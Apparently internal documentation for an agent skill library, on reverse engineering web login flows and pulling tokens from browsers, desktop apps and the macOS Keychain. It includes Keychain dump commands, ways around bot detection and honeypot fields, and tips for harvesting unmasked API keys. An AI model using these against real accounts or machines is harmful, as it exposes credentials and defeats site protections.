brave-browser | cookie_get({ domain: "..." }) | Decrypts from Brave’s encrypted cookie DB |
firefox | cookie_get({ domain: "..." }) | Reads from Firefox profile |
playwright | cookie_get({ domain: "..." }) | From Playwright’s own browser session (after login) |
Working with Playwright
Practical notes for using the Playwright skill during discovery.
Use type, not fill, for React forms
React manages input state through synthetic events. fill sets the DOM value
directly, bypassing React — the component state stays empty and submit buttons
stay disabled. type sends real keystrokes that trigger onChange handlers.
# React form — use type
type { selector: "input[type=email]", text: "user@example.com" }
# Plain HTML form — either works
fill { selector: "input[type=email]", value: "user@example.com" }
If the submit button is disabled after entering text, you probably need type.
Watch for honeypot fields
Some login forms have hidden inputs designed to catch bots:
<input name="website" type="text" style="display:none">
These are invisible to users but bots that fill every field get caught. In
HTTPX replay, never include these fields. Common names: website, url,
homepage, company, fax.
If your HTTPX replay silently fails (200 response but nothing happens), check for honeypot fields you might be filling.
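When building the replay payload it is worth filtering known trap names explicitly. A sketch; the name set is an assumption drawn from the list above, and strip_honeypots is a hypothetical helper:

```python
# Honeypot field names commonly seen in login forms (assumed list; extend
# with whatever the inspected form actually contains).
HONEYPOT_NAMES = {"website", "url", "homepage", "company", "fax"}

def strip_honeypots(form_fields: dict) -> dict:
    """Drop hidden trap fields before replaying a form POST."""
    return {k: v for k, v in form_fields.items() if k not in HONEYPOT_NAMES}

payload = strip_honeypots({
    "email": "user@example.com",
    "csrfToken": "abc123",
    "website": "",  # honeypot: present in the DOM, must NOT be sent
})
```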
Navigate to dashboard, not auth
Always start at the dashboard URL. The auth domain needs the callbackUrl
parameter (set by the dashboard redirect) to know where to send you after
login. Going to auth directly often shows “accessed incorrectly” errors.
Clearing state for a fresh run
clear_cookies { domain: ".example.com" }
Useful when existing cookies skip you past the login page and you need to observe the full flow from scratch.
Auth patterns
NextAuth.js / Auth.js
The most common pattern for Next.js dashboards. Recognized by /api/auth/*
endpoints and next-auth.* cookies.
Quick identification:
- GET /api/auth/csrf returns a CSRF token
- GET /api/auth/providers lists available login methods
- Session cookie: next-auth.session-token (encrypted JWT, ~30 day expiry)
Email login flow (fully HTTPX for custom OTP sites):
1. GET /api/auth/csrf → CSRF token (HTTPX)
2. POST /api/auth/signin/email → triggers email (HTTPX)
3. POST /api/verify-otp → verify code, get token components (HTTPX)
4. GET /api/auth/callback/email?token=... → session cookie set (HTTPX)
The key insight: many NextAuth sites with custom OTP code entry have a hidden
/api/verify-otp endpoint discoverable via JS bundle scanning. The callback
token format (hashedOtp:rawOtp) was discovered using the Navigation API
interceptor. See nextauth.md for the full deep dive.
Reference implementation: skills/exa/.
AWS Cognito
Common in gym/fitness SaaS (Approach, Mindbody, etc.). Pure AWS API calls — no browser needed at all.
import json

from agentos import http
headers = http.headers(extra={
"X-Amz-Target": "AWSCognitoIdentityProviderService.InitiateAuth",
"Content-Type": "application/x-amz-json-1.1",
})
with http.client(headers=headers) as client:
resp = client.post(
"https://cognito-idp.us-east-1.amazonaws.com/",
content=json.dumps({
"AuthFlow": "USER_PASSWORD_AUTH",
"ClientId": client_id,
"AuthParameters": {"USERNAME": email, "PASSWORD": password},
}).encode(),
)
tokens = resp.json()["AuthenticationResult"]
# Use tokens["AccessToken"] as Bearer token
Find the ClientId in the app’s JS bundle — search for userPoolId or
userPoolClientId.
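A minimal bundle-scan sketch for pulling those IDs out of the JS; find_cognito_config is illustrative, not a library function, and the sample bundle string is made up:

```python
import re

def find_cognito_config(bundle_text: str) -> dict:
    """Scan JS bundle text for Cognito pool/client IDs with a simple regex."""
    config = {}
    for key in ("userPoolId", "userPoolClientId"):
        m = re.search(rf'["\']?{key}["\']?\s*:\s*["\']([^"\']+)["\']', bundle_text)
        if m:
            config[key] = m.group(1)
    return config

bundle = 'window.cfg={"userPoolId":"us-east-1_AbCdEf123","userPoolClientId":"4h7j2kexample"};'
cfg = find_cognito_config(bundle)
```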
WorkOS
B2B auth platform. Supports SSO, social login, and email. Recognized by
workos_id in JWT claims.
See workos.md for the full deep dive.
Cookie-based sessions (generic)
For any site that uses session cookies without a framework like NextAuth:
- Walk through the login in Playwright
- Extract cookies: cookies { domain: ".example.com" }
- Use them with http.client(cookies={...})
Reference implementations:
- skills/claude/claude-login.py (Cloudflare-protected)
- skills/amazon/amazon.py (tiered cookie architecture, Siege bypass)
Tiered cookie architectures
Large services like Amazon use multiple cookie tiers for different access levels:
| Tier | Cookies | Access |
|---|---|---|
| Session | session-id, session-token, ubid-main | Browsing, search |
| Persistence | x-main | “Remember me” across sessions |
| Authentication | at-main (Atza|...), sess-at-main | Account pages, order history |
| SSO | sst-main (Sst1|...), sso-state-main | Cross-service auth |
When building a skill against a tiered service, you need the full cookie jar from a logged-in browser — not just the session cookie. The auth tokens are interdependent and the server validates them together.
Some cookies should be excluded (see 1-transport for cookie stripping) — encryption trigger cookies, WAF telemetry, etc. But the auth-tier cookies must all be present.
Auth boundaries
Not every operation needs a login. During discovery, classify each endpoint:
| Tier | Description | Example |
|---|---|---|
| Public | Works with just a frontend API key | Goodreads search, Exa search API |
| Suggested auth | Richer results with a session, but works without | Goodreads reviews (adds viewerHasLiked) |
| Required auth | Fails without session cookies | Dashboard APIs, mutations, user-specific data |
To map boundaries: send each request without auth. If you get data, it’s public. If you get partial data with errors on some fields, it’s suggested auth. If you get a 401/403 or an auth error, it’s required.
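The probing rule can be written down directly. A sketch that assumes GraphQL-style data/errors response bodies; adapt the partial-data check per service:

```python
def classify_auth_tier(status_code: int, body: dict) -> str:
    """Classify one unauthenticated probe into the three auth tiers."""
    if status_code in (401, 403):
        return "required"   # hard failure without a session
    if body.get("data") and body.get("errors"):
        return "suggested"  # partial data with field-level auth errors
    return "public"

# Example probes (shapes are illustrative):
tier = classify_auth_tier(200, {"data": {"book": {"title": "..."}},
                                "errors": [{"message": "unauthorized field"}]})
```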
In the skill manifest, mark public operations with auth: none:
operations:
search: # public — no cookies
auth: none
get_api_keys: # requires dashboard session
connection: dashboard
Runtime config discovery
Some services rotate API keys or endpoints when they deploy. For these, build a multi-tier discovery chain that self-heals:
| Tier | Source | Latency | Notes |
|---|---|---|---|
| 1 | Cache | instant | works until config rotates |
| 2 | Bundle extract | 1-2s | parse the JS bundle for config |
| 3 | Browser capture | 10-15s | load the page and capture network |
| 4 | Hardcoded | instant | but may be stale |
Note: File-based caching has been replaced by sandbox storage — the executor reads/writes cache values on the skill’s graph node. See spec/sandbox-storage.md.
Implementation
def discover_runtime(**kwargs) -> dict:
cached = _load_cache()
if cached:
return cached
config = discover_from_bundle(kwargs.get("html_text"))
if config:
_save_cache(config)
return config
config = discover_via_browser(kwargs.get("page_url"))
if config:
_save_cache(config)
return config
return {"endpoint": FALLBACK_ENDPOINT, "api_key": FALLBACK_API_KEY}
Multi-environment bundles
Production JS bundles often ship configs for all environments. Pick Prod:
| Signal | Example |
|---|---|
| shortName field | "shortName": "Prod" |
| Ads enabled | "showAds": true |
| Analytics enabled | "publishWebVitalMetrics": true |
Reference: skills/goodreads/public_graph.py discover_from_bundle().
Examples
| Skill | Pattern | What to learn from it |
|---|---|---|
| skills/amazon/ | Tiered cookie auth, Siege encryption bypass, SESSION_EXPIRED retry | Full client hints, cookie stripping for anti-bot, session warming, provider retry convention |
| skills/exa/ | NextAuth email code → fully HTTPX (no browser) → API keys | JS bundle scanning for custom endpoints, Navigation API interception, OTP token format discovery, Vercel http2=False bypass |
| skills/goodreads/ | Multi-tier discovery, AppSync, auth boundary mapping | Bundle extraction, config rotation, public vs auth operations |
| skills/claude/ | Cloudflare-protected cookie extraction | Stealth Playwright settings, HttpOnly cookies via CDP |
| skills/austin-boulder-project/ | Bundle-extracted API key, tenant namespace | JS config scanning, namespace-as-auth |
Vendor guides
| Guide | When to read it |
|---|---|
| nextauth.md | Sites with /api/auth/* endpoints, next-auth.* cookies |
| workos.md | Sites with workos_id in JWT claims, WorkOS session IDs |
| macos-keychain.md | Native macOS apps, Electron Safe Storage, Google OAuth tokens, full credential audit |
NextAuth.js (Auth.js) Pattern
NextAuth.js (rebranded to Auth.js) is the most popular auth library for Next.js apps. Many SaaS dashboards use it for email login, Google SSO, and enterprise auth (via WorkOS or similar). Understanding its conventions accelerates reverse engineering because the endpoint structure, cookie names, and flow mechanics are predictable.
Part of Layer 3: Auth & Runtime. Discovered during the Exa skill reverse engineering session.
Recognizing NextAuth
Any of these signals indicate NextAuth:
| Signal | Example |
|---|---|
| Auth endpoints at /api/auth/* | /api/auth/csrf, /api/auth/providers, /api/auth/session |
| CSRF cookie | __Host-next-auth.csrf-token (value is token%7Chash) |
| Callback URL cookie | __Secure-next-auth.callback-url |
| Session cookie | next-auth.session-token (JWT, HttpOnly, ~30 day expiry) |
| Separate auth subdomain | auth.example.com with redirects to dashboard.example.com |
| Provider list endpoint | GET /api/auth/providers returns JSON with provider configs |
Quick probe
capture_network { url: "https://auth.example.com", pattern: "**/api/auth/**", wait: 3000 }
If you see /api/auth/csrf and /api/auth/providers in the capture, it’s NextAuth.
Provider discovery
evaluate { script: "fetch('/api/auth/providers').then(r=>r.json()).then(d=>JSON.stringify(d))" }
Returns something like:
{
"email": { "id": "email", "name": "Email", "type": "email", "signinUrl": "/api/auth/signin/email" },
"google": { "id": "google", "name": "Google", "type": "oauth", "signinUrl": "/api/auth/signin/google" },
"workos": { "id": "workos", "name": "WorkOS", "type": "oauth", "signinUrl": "/api/auth/signin/workos" }
}
This tells you exactly which login methods are available before you try anything.
Endpoint map
All endpoints live under the auth domain’s /api/auth/ prefix.
| Endpoint | Method | Purpose |
|---|---|---|
| /api/auth/csrf | GET | Returns { csrfToken: "..." } and sets the CSRF cookie |
| /api/auth/providers | GET | Lists available auth providers with their signin URLs |
| /api/auth/signin/email | POST | Triggers verification code/link email |
| /api/auth/signin/google | POST | Initiates Google OAuth redirect |
| /api/auth/callback/email | GET/POST | Handles email verification callback |
| /api/auth/callback/google | GET | Handles Google OAuth callback |
| /api/auth/session | GET | Returns current session (user info, expiry) |
| /api/auth/signout | POST | Destroys session |
CSRF token
Every mutating request requires the CSRF token, obtained from /api/auth/csrf:
resp = client.get(f"{AUTH_BASE}/api/auth/csrf")
csrf_token = resp.json()["csrfToken"]
The response also sets a __Host-next-auth.csrf-token cookie. The value is
token%7Chash — the token and a hash separated by | (URL-encoded as %7C).
Both the cookie and the csrfToken field in the POST body must match.
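Splitting the cookie value is a one-liner with the stdlib. A sketch; split_csrf_cookie is a hypothetical helper, and the token half is what must match the csrfToken field in the POST body:

```python
from urllib.parse import unquote

def split_csrf_cookie(cookie_value: str) -> tuple[str, str]:
    """Split a __Host-next-auth.csrf-token value (token%7Chash) into (token, hash)."""
    token, _, digest = unquote(cookie_value).partition("|")
    return token, digest

token, digest = split_csrf_cookie("abc123%7Cdeadbeef")
```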
Email verification flow
NextAuth’s email provider sends a verification code (or sometimes a magic link, depending on the site’s configuration). The standard flow:
Step 1: Trigger the email (HTTPX-compatible)
csrf_token = _get_csrf_token(client)
client.post(
f"{AUTH_BASE}/api/auth/signin/email",
data={
"email": email,
"csrfToken": csrf_token,
"callbackUrl": "https://dashboard.example.com/",
"json": "true",
},
headers={"Content-Type": "application/x-www-form-urlencoded"},
)
This sends the verification email. The response is typically { "url": "..." }
pointing to a “check your email” page.
Step 2: Code/token submission
Standard NextAuth uses a magic link that hits:
GET /api/auth/callback/email?callbackUrl=...&token=TOKEN&email=EMAIL
Where TOKEN is the raw verification token. NextAuth hashes it as
SHA256(token + NEXTAUTH_SECRET) and compares with the stored hash.
Custom OTP implementations (e.g. Exa) display a 6-digit code entry page instead of a magic link. These typically have a custom verification endpoint:
POST /api/verify-otp
Body: {"email": "user@example.com", "otp": "123456"}
→ {"email": "...", "hashedOtp": "$2a$10$...", "rawOtp": "123456"}
The client-side JS then constructs the NextAuth callback token from the response and redirects to the standard callback:
GET /api/auth/callback/email?token=HASHED_OTP:RAW_OTP&email=EMAIL&callbackUrl=...
The token format is {hashedOtp}:{rawOtp} — bcrypt hash, colon, raw code.
This is fully replayable via HTTPX. No browser needed.
Discovery playbook for custom OTP flows
When the standard NextAuth callback fails with error=Verification, the site
has a custom OTP layer. Follow these steps to crack it:
Step A: Scan JS bundles for custom endpoints
# Search terms that reveal custom auth endpoints
scan_bundles(auth_url, [
"verify-otp", "verify-code", "confirm-code", # custom verification
"callback/email", "hashedOtp", "rawOtp", # token construction
"fetch(", "/api/", # general API calls
])
Look for fetch("/api/verify-...") calls in the bundle context. The
surrounding code usually reveals the request shape and response handling.
Step B: Read the library source
Check what the server expects. For NextAuth, the key file is
callback/index.ts.
The email handler does createHash(token + secret) — this tells you the
token parameter must match what the server originally stored.
Step C: Intercept the client-side token construction
If the bundle shows the endpoint but the token construction is complex or spread across minified closures, use the Navigation API interceptor:
evaluate { script: "navigation.addEventListener('navigate', (e) => { window.__intercepted_nav_url = e.destination.url; e.preventDefault(); }); 'interceptor installed'" }
Then trigger the action:
click { selector: "button:text-is('VERIFY CODE')" }
evaluate { script: "window.__intercepted_nav_url" }
The captured URL will contain the fully-assembled token, e.g.:
https://auth.exa.ai/api/auth/callback/email?token=$2a$10$...%3A123456&email=...
URL-decode it and the format is obvious: {bcrypt_hash}:{raw_otp}.
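Decoding the captured URL is easiest with the stdlib. A sketch; extract_callback_token is a hypothetical helper, and the sample URL below uses a shortened placeholder hash:

```python
from urllib.parse import urlsplit, parse_qs

def extract_callback_token(captured_url: str) -> tuple[str, str]:
    """Pull the token out of an intercepted callback URL and split it."""
    qs = parse_qs(urlsplit(captured_url).query)  # parse_qs URL-decodes values
    # bcrypt hashes contain '$' but no ':', so splitting on the last colon is safe
    hashed_otp, _, raw_otp = qs["token"][0].rpartition(":")
    return hashed_otp, raw_otp

url = ("https://auth.exa.ai/api/auth/callback/email"
       "?token=%242a%2410%24abc%3A123456&email=user%40example.com")
hashed, raw = extract_callback_token(url)
```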
Step D: Replay with HTTPX
Now you know the full flow — reproduce it with HTTPX:
1. POST /api/verify-otp with {email, otp} → get {hashedOtp, rawOtp}
2. Construct token = f"{hashedOtp}:{rawOtp}"
3. GET /api/auth/callback/email?token=...&email=... → session cookie
See Discovery: JS Bundle Scanning and Discovery: Navigation API Interception for the general techniques.
Step 3: Session establishment
After successful verification (either path), the server sets the
next-auth.session-token cookie and redirects to the callback URL.
Validate the session:
resp = client.get(f"{DASHBOARD_BASE}/api/auth/session")
session = resp.json()
# { "user": { "email": "...", "id": "...", "teams": [...] }, "expires": "..." }
Cookie anatomy
| Cookie | Domain | HttpOnly | Secure | SameSite | Expiry | Purpose |
|---|---|---|---|---|---|---|
| __Host-next-auth.csrf-token | auth domain | Yes | Yes | Lax | Session | CSRF double-submit |
| __Secure-next-auth.callback-url | auth domain | Yes | Yes | Lax | Session | Where to redirect after auth |
| next-auth.session-token | .parent-domain | Yes | Yes | Lax | ~30 days | JWT session (the important one) |
Cross-domain note: The session token is typically scoped to the parent domain
(e.g. .exa.ai) so it works across both auth.exa.ai and dashboard.exa.ai.
The CSRF and callback cookies are scoped to the auth subdomain only.
For HTTPX replay, you only need next-auth.session-token for authenticated
API calls. The CSRF and callback cookies are only needed during the login flow
itself.
Session token (JWT)
The next-auth.session-token is an encrypted JWT (JWE with A256GCM). You
can’t decode it without the server’s secret — but you don’t need to. Just pass
it as a cookie to authenticated endpoints.
import httpx

# Use http2=False for Vercel-hosted dashboards (Security Checkpoint blocks h2)
# Use http2=True for other hosts (CloudFront, plain Cloudflare, etc.)
with httpx.Client(
http2=False, # adjust per host — see 1-transport
follow_redirects=True,
cookies={"next-auth.session-token": session_token},
) as client:
resp = client.get(f"{DASHBOARD_BASE}/api/get-api-keys")
The server decodes the JWT server-side and returns the session info via
/api/auth/session. See Transport: http2 selection
for how to determine the right setting per host.
Gotchas
Auth subdomain vs dashboard domain
Many NextAuth sites separate auth and dashboard onto different subdomains.
Navigate to the dashboard domain (e.g. https://dashboard.exa.ai), not the
auth domain directly. The dashboard redirects to auth with the correct
callbackUrl parameter. Going to auth directly often shows “accessed
incorrectly” errors because the callback URL is missing.
Honeypot fields
Some NextAuth login forms include hidden honeypot fields (e.g.
input[name="website"]). Never fill these in HTTPX replay. See
Playwright Discovery Gotchas for details.
React forms need type not fill
NextAuth login pages built with React/Next.js require Playwright’s type
command (real keystrokes) rather than fill (direct DOM manipulation). fill
bypasses React’s synthetic event system and leaves form state empty. See
Playwright Discovery Gotchas.
Vercel Security Checkpoint
Many NextAuth dashboards are hosted on Vercel. Vercel’s Security Checkpoint
blocks httpx(http2=True) outright — returning 429 with a JS challenge
page regardless of cookies or headers. The fix is httpx(http2=False).
This is purely a JA4 TLS fingerprint issue. httpx’s h2 fingerprint is well-known to Vercel’s bot detection. h1 is less distinctive and passes. See Layer 1: Transport for the full analysis.
Not every Vercel subdomain enables the checkpoint. Test each one — during
Exa reverse engineering, auth.exa.ai accepted h2 while dashboard.exa.ai
rejected it. The checkpoint is a per-project Vercel Firewall setting.
Cloudflare protection
Some NextAuth sites sit behind Cloudflare (separate from Vercel’s layer)
and set a cf_clearance cookie after a JS challenge. cf_clearance is
bound to the client’s TLS fingerprint and IP — it only works from the
same fingerprint that solved the challenge.
In practice, for Vercel-hosted dashboards the http2=False fix is
sufficient and cf_clearance isn’t needed. Store it if available (it’s
cheap insurance), but don’t depend on it for HTTPX access.
Dashboard API patterns
Once authenticated, NextAuth dashboards typically expose REST APIs under
/api/. These are standard Next.js API routes — no special auth headers needed,
just the session cookie.
Common patterns discovered during reverse engineering:
| Endpoint pattern | What it returns |
|---|---|
| /api/auth/session | User profile, team memberships, feature flags |
| /api/get-api-keys | API keys (may include full values!) |
| /api/get-teams | Team info, rate limits, billing, usage |
| /api/create-api-key | Creates a new key (POST, JSON body) |
| /api/service-api-keys?teamId= | Service-level keys (separate from user keys) |
Always check raw API responses. Dashboard UIs routinely mask sensitive
values (API keys, tokens) client-side, but the underlying API returns them in
full. During reverse engineering, use capture_network on authenticated pages
and read the complete JSON response bodies.
See Dashboard APIs leak more than the UI for the general pattern.
Real-world example: Exa
Exa (dashboard.exa.ai / auth.exa.ai) is the reference implementation for
this pattern in the agentOS skill library. The entire email login flow is
browser-free — every step uses HTTPX.
Architecture:
- Auth domain: auth.exa.ai (NextAuth.js, Vercel-hosted)
- Dashboard domain: dashboard.exa.ai (Vercel-hosted, Security Checkpoint enabled)
- Providers: email, google, workos
- Email verification: 6-digit OTP code (custom /api/verify-otp endpoint)
- Session: encrypted JWT in next-auth.session-token on .exa.ai
- Transport: httpx(http2=False) for dashboard (Vercel checkpoint blocks h2)
Skill operations:
- send_login_code — triggers verification email via HTTPX
- verify_login_code — verifies OTP code, constructs token, completes login (fully HTTPX)
- store_session_cookies — fallback for Google SSO (Playwright cookies)
- get_api_keys — lists keys (full values in id field) via HTTPX
- get_teams — team info, rate limits, credits via HTTPX
- create_api_key — creates a new key via HTTPX
Key findings:
- The id field in /api/get-api-keys is the full API key value (UUID format). The dashboard masks it, but the API returns it unmasked.
- The custom OTP endpoint (POST /api/verify-otp) was found via JS bundle scanning — it doesn’t appear in any NextAuth documentation.
- The callback token format (hashedOtp:rawOtp) was discovered using the Navigation API interceptor in Playwright, then replayed entirely with HTTPX.
How it was reverse-engineered (summary):
1. Identify framework: GET /api/auth/providers → NextAuth
2. Try standard flow: POST /api/auth/signin/email → sends code OK; GET /api/auth/callback/email?token=CODE → error=Verification (the 6-digit code isn’t the raw token NextAuth expects)
3. Scan JS bundles: search for verify-otp, callback/email, fetch( → found POST /api/verify-otp accepting {email, otp}, returning {hashedOtp, rawOtp}
4. Read library source: NextAuth’s callback/index.ts shows the server does SHA256(token + secret) — so the token must be the pre-hash value
5. Intercept with Navigation API: inject navigation.addEventListener, click “VERIFY CODE”, capture the destination URL → token format is {hashedOtp}:{rawOtp} (bcrypt hash, colon, raw OTP)
6. Replay with HTTPX: POST /api/verify-otp → construct token → GET /api/auth/callback/email?token=... → session cookie set
See skills/exa/exa.py and skills/exa/readme.md for the full implementation.
Comparison with WorkOS
| Aspect | NextAuth | WorkOS |
|---|---|---|
| Where it lives | In the app (Next.js API routes) | External auth service |
| JWT decoding | Encrypted (JWE), opaque | Standard JWT, decodable |
| Session storage | Cookie-based (JWT in cookie) | Cookie or token-based |
| Token refresh | Automatic via session cookie | Explicit refresh token flow |
| Identification | /api/auth/* routes, next-auth.* cookies | workos in JWT iss, workos_id claim |
| Multi-tenant | App-specific | Built-in organization/team support |
See WorkOS Auth Pattern for the WorkOS-specific methodology.
WorkOS Auth Pattern
WorkOS is a B2B auth platform used by many SaaS and desktop apps. It started as an enterprise SSO product (SAML, SCIM) but added WorkOS User Management in 2023 — a full-stack auth system covering consumer sign-up, social login, and enterprise SSO in one package.
Part of Layer 3: Auth & Runtime. See also Electron deep dive for how WorkOS tokens are stored in Electron apps.
Recognizing WorkOS
The JWT iss (issuer) claim will contain workos or point to a custom auth
domain backed by WorkOS:
{
"iss": "https://auth.granola.ai/user_management/client_01JZJ0X...",
"workos_id": "user_01K2JVZM...",
"external_id": "c3b1fa46-...",
"sid": "session_01KH4JGG...",
"sign_in_method": "CrossAppAuth"
}
Key claims:
| Claim | Meaning |
|---|---|
| `workos_id` | WorkOS-native user ID (`user_01...`) |
| `external_id` | Previous auth provider’s user UUID (preserved on migration) |
| `sid` | WorkOS session ID (`session_01...`) |
| `sign_in_method` | How the session was created: `SSO`, `Password`, `GoogleOAuth`, `CrossAppAuth` |
| `iss` | Contains `/user_management/client_<id>` for WorkOS User Management |
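To check these claims on a captured token, decode the JWT payload without verifying the signature (a sketch for inspection only, not validation):

```python
import base64
import json


def jwt_claims(token: str) -> dict:
    """Decode a JWT payload without signature verification (inspection only)."""
    payload = token.split(".")[1]
    payload += "=" * (-len(payload) % 4)  # restore stripped base64 padding
    return json.loads(base64.urlsafe_b64decode(payload))
```

A token is WorkOS-issued if `workos` appears in `claims["iss"]` or a `workos_id` claim is present.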
Token File Shape
Apps that store WorkOS tokens locally typically use one of these shapes:
Post-migration (Supabase → WorkOS)
{
"workos_tokens": "{\"access_token\":\"eyJ...\",\"refresh_token\":\"...\",\"expires_in\":21599,\"obtained_at\":1234567890,\"session_id\":\"session_01...\",\"external_id\":\"uuid\",\"sign_in_method\":\"CrossAppAuth\"}",
"session_id": "session_01...",
"user_info": "{\"id\":\"uuid\",\"email\":\"...\"}"
}
Note: workos_tokens is a JSON string (double-encoded), not an object.
import json
with open("supabase.json") as f:
raw = json.load(f)
tokens = json.loads(raw["workos_tokens"]) # parse the inner string
access_token = tokens["access_token"]
refresh_token = tokens["refresh_token"]
expires_in = tokens["expires_in"] # seconds
obtained_at = tokens["obtained_at"] # ms epoch
Native WorkOS storage
Some apps store tokens more directly:
{
"access_token": "eyJ...",
"refresh_token": "...",
"token_type": "Bearer",
"expires_in": 3600
}
Token Lifecycle
WorkOS access tokens are short-lived (typically 6 hours / 21600s).
import time, json, base64
def is_expired(token: str, buffer_s: int = 300) -> bool:
    payload = token.split('.')[1]
    payload += '=' * (-len(payload) % 4)  # restore stripped base64 padding
    claims = json.loads(base64.urlsafe_b64decode(payload))
    return claims['exp'] < time.time() + buffer_s
def get_token(token_file: str) -> str:
with open(token_file) as f:
raw = json.load(f)
tokens = json.loads(raw.get("workos_tokens", "{}")) or raw
access = tokens["access_token"]
if is_expired(access):
# Option A: open the app to refresh
# Option B: call the WorkOS refresh endpoint directly
raise ValueError("Token expired — open the app to refresh")
return access
Refreshing without the app
If you have the refresh_token and client_id, you can refresh directly:
import httpx, json
def refresh_workos_token(refresh_token: str, client_id: str, auth_domain: str) -> dict:
"""auth_domain e.g. 'https://auth.granola.ai'"""
resp = httpx.post(f"{auth_domain}/user_management/authenticate", json={
"client_id": client_id,
"grant_type": "refresh_token",
"refresh_token": refresh_token,
})
resp.raise_for_status()
return resp.json()
The client_id is embedded in the iss claim:
https://auth.example.com/user_management/client_01JZJ0X... →
client_01JZJ0X...
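That extraction is just the last path segment of the issuer URL; a minimal sketch:

```python
def client_id_from_iss(iss: str) -> str:
    """The WorkOS client_id is the last path segment of the issuer URL."""
    return iss.rstrip("/").rsplit("/", 1)[-1]
```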
Calling the API
WorkOS-protected APIs expect a standard Bearer token, usually alongside app-specific identity headers. Always check the bundle for custom headers before assuming a 401 is a token problem:
import json, httpx
from pathlib import Path
TOKEN_FILE = Path.home() / "Library/Application Support/AppName/supabase.json"
def get_headers() -> dict:
with open(TOKEN_FILE) as f:
raw = json.load(f)
tokens = json.loads(raw["workos_tokens"])
return {
"Authorization": f"Bearer {tokens['access_token']}",
"X-Client-Version": "1.0.0", # from app package.json
"X-Client-Platform": "darwin",
# Add X-Workspace-Id, X-Device-Id etc. if the app sends them
}
with httpx.Client(http2=True) as client:
resp = client.post("https://api.example.com/v1/some-endpoint",
json={"param": "value"},
headers=get_headers())
print(resp.json())
Supabase → WorkOS Migration
Many companies migrated from Supabase Auth to WorkOS. Signs you’ve hit a migrated app:
- Token file named `supabase.json` but contains a `workos_tokens` key
- JWT has both `workos_id` and `external_id` (the old Supabase UUID)
- `iss` points to a custom domain (not `supabase.co`)
- Database tables still use the old Supabase UUID as primary key
The migration preserves the old UUID as external_id precisely so FK
constraints don’t need to be updated.
Why migrate? Supabase Auth is great for consumer apps; WorkOS adds enterprise SSO (SAML/OIDC), SCIM directory sync, and an admin portal. B2B SaaS companies migrate when enterprise customers demand SSO.
Common migration path:
Supabase Auth → WorkOS User Management → (optionally) full WorkOS SSO
Competitors in this space: Clerk (more consumer/Next.js focused), Auth0 (enterprise, heavyweight), Stytch (developer-first).
macOS Keychain — Credential Audit & Token Extraction
The macOS Keychain is where native apps store OAuth tokens, API keys, session credentials, and encryption keys. For skill development, it’s the primary source for credentials held by desktop apps (Mimestream, Cursor, GitHub CLI, etc.).
What the Keychain Actually Contains
Running a full Keychain dump reveals the complete credential landscape of a machine:
security dump-keychain 2>/dev/null | grep '"svce"\|"acct"'
What you’ll find falls into predictable categories:
1. Native app OAuth tokens
Apps that do their own OAuth login store per-account tokens under a service name that identifies the app and account:
"svce" = "Mimestream: user@example.com"
"acct" = "OAuth"
security find-generic-password -s "Mimestream: user@example.com" -a "OAuth" -w
returns a binary plist containing access_token, refresh_token, expires_in,
client_id, and token_url. This is exactly what mimestream.credential_get
reads.
2. Electron “Safe Storage” encryption keys
Every Chromium-based app (Brave, Chrome, Cursor, Slack, Discord, VS Code, etc.) stores a single master key in the Keychain:
"svce" = "Brave Safe Storage"
"svce" = "Cursor Safe Storage"
"svce" = "Slack Safe Storage"
"svce" = "discord Safe Storage"
This key encrypts everything the app stores locally — saved passwords, OAuth tokens, session cookies, localStorage. The encrypted data lives in:
~/Library/Application Support/<AppName>/
Local Storage/leveldb/ ← encrypted
Cookies ← SQLite, values encrypted
Login Data ← Chromium password manager
To read any of those, you need the Safe Storage key first. The key is not guarded by an ACL in most cases — any process running as the same user can read it silently without prompting.
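The derivation Chromium applies to that key uses fixed, well-known constants from Chromium's `os_crypt` source. A stdlib sketch of the key-derivation step; the AES-128-CBC decryption of the actual values needs a third-party library such as `cryptography`:

```python
import hashlib


def chromium_cookie_key(safe_storage_key: str) -> bytes:
    """Derive the 16-byte AES key Chromium on macOS uses for local values.

    Constants from Chromium's os_crypt: PBKDF2-HMAC-SHA1, salt b"saltysalt",
    1003 iterations, 16-byte output. Encrypted values carry a "v10" prefix
    and decrypt with AES-128-CBC using an IV of 16 spaces.
    """
    return hashlib.pbkdf2_hmac(
        "sha1", safe_storage_key.encode(), b"saltysalt", 1003, dklen=16
    )
```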
3. CLI tool OAuth tokens
"svce" = "gh:github.com"
"acct" = "username"
The GitHub CLI (gh) stores OAuth tokens here, one entry per account.
security find-generic-password -s "gh:github.com" -a "username" -w
returns the token directly.
4. API keys stored by apps
Some apps store their API keys directly:
"acct" = "raycast_ai_anthropic_apikey"
"acct" = "raycast_ai_openRouterAPIKey"
"acct" = "search_tavily_BLoLA9AB"
These are direct string values — no OAuth, no structure. One security call
returns the key.
5. App session tokens
"svce" = "cursor-access-token"
"svce" = "cursor-refresh-token"
"acct" = "cursor-user"
SaaS desktop apps that use their own auth (not Electron’s Safe Storage pattern) store session tokens directly as named items.
6. Password manager infrastructure (1Password)
"svce" = "1Password:domain-key-acls"
"svce" = "1Password:device-unlock-ask-again-after"
1Password stores its internal device unlock keys and domain key ACL mappings in the Keychain. These are protected — 1Password sets proper ACLs on its items so other processes can’t read them silently. This is the exception; most apps don’t bother with ACLs.
Three Google OAuth Patterns on macOS
Not all Google-authorized apps look the same locally. When you check
myaccount.google.com/permissions, the entries come from three distinct
mechanisms — each with different detection methods and different local traces.
Pattern 1: Native PKCE apps (Info.plist URL scheme)
Apps like Mimestream, BusyContacts, and Strongbox embed a Google
client ID directly in their app bundle. They register a reversed client ID
as a URL scheme in Info.plist — this is how Google redirects the auth code
back to the app after the user approves.
com.googleusercontent.apps.1064022179695-5793e1qdeuvrmvi5bfgg3rcv3aj62nfb
Reverse it to get the client ID:
1064022179695-5793e1qdeuvrmvi5bfgg3rcv3aj62nfb.apps.googleusercontent.com
These are “public clients” — the client ID is public by design. What protects the user is PKCE during login and the refresh token afterward (see sections below).
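The reversal is purely mechanical; a one-liner sketch (`scheme_to_client_id` is a hypothetical helper name):

```python
def scheme_to_client_id(url_scheme: str) -> str:
    """Reverse a com.googleusercontent.apps.<id> URL scheme into a client ID."""
    return ".".join(reversed(url_scheme.split(".")))
```

Applied to the scheme above, this yields the `<id>.apps.googleusercontent.com` form.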
Detection: Scan Info.plist URL schemes for googleusercontent.apps.
Where to scan: Apps install in multiple locations — scanning only
/Applications/*.app misses a lot:
# All common install locations
for dir in /Applications /Applications/Setapp ~/Applications /System/Applications; do
[ -d "$dir" ] || continue
for app in "$dir"/*.app; do
result=$(plutil -p "$app/Contents/Info.plist" 2>/dev/null | grep "googleusercontent")
